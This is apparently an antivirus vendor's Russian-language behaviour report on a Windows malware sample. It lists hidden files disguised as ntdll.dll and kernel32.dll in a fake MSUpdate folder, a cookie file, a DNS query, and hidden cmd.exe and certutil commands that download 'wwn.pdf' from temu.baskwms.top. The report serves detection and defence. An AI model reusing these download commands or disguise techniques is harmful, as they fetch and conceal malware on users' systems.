Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- 'C:\users\public\documents\msupdate_51262\ntdll.dll' -k -s -L -o "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" http://temu.baskwms.top/wwn.pdf
- 'C:\users\public\documents\msupdate_51262\kernel32.dll' /transfer job /download /priority normal http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf"
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\documents\msupdate_51262\ntdll.dll
- C:\users\public\documents\msupdate_51262\kernel32.dll
- %LOCALAPPDATA%\microsoft\windows\inetcookies\deprecated.cookie
Присваивает атрибут 'скрытый' для следующих файлов
- C:\users\public\documents\msupdate_51262\ntdll.dll
- C:\users\public\documents\msupdate_51262\kernel32.dll
Сетевая активность
UDP
- DNS ASK te##.#askwms.top
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Documents\MSUpdate_51262\ntdll.dll -k -s -L -o "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" http://temu.baskwms.top/wwn.pdf (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c C:\Users\Public\Documents\MSUpdate_51262\kernel32.dll /transfer job /download /priority normal http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -split -f http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf" (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://temu.baskwms.top/wwn.pdf "C:\Users\Public\Documents\MSUpdate_51262\wwn.pdf"
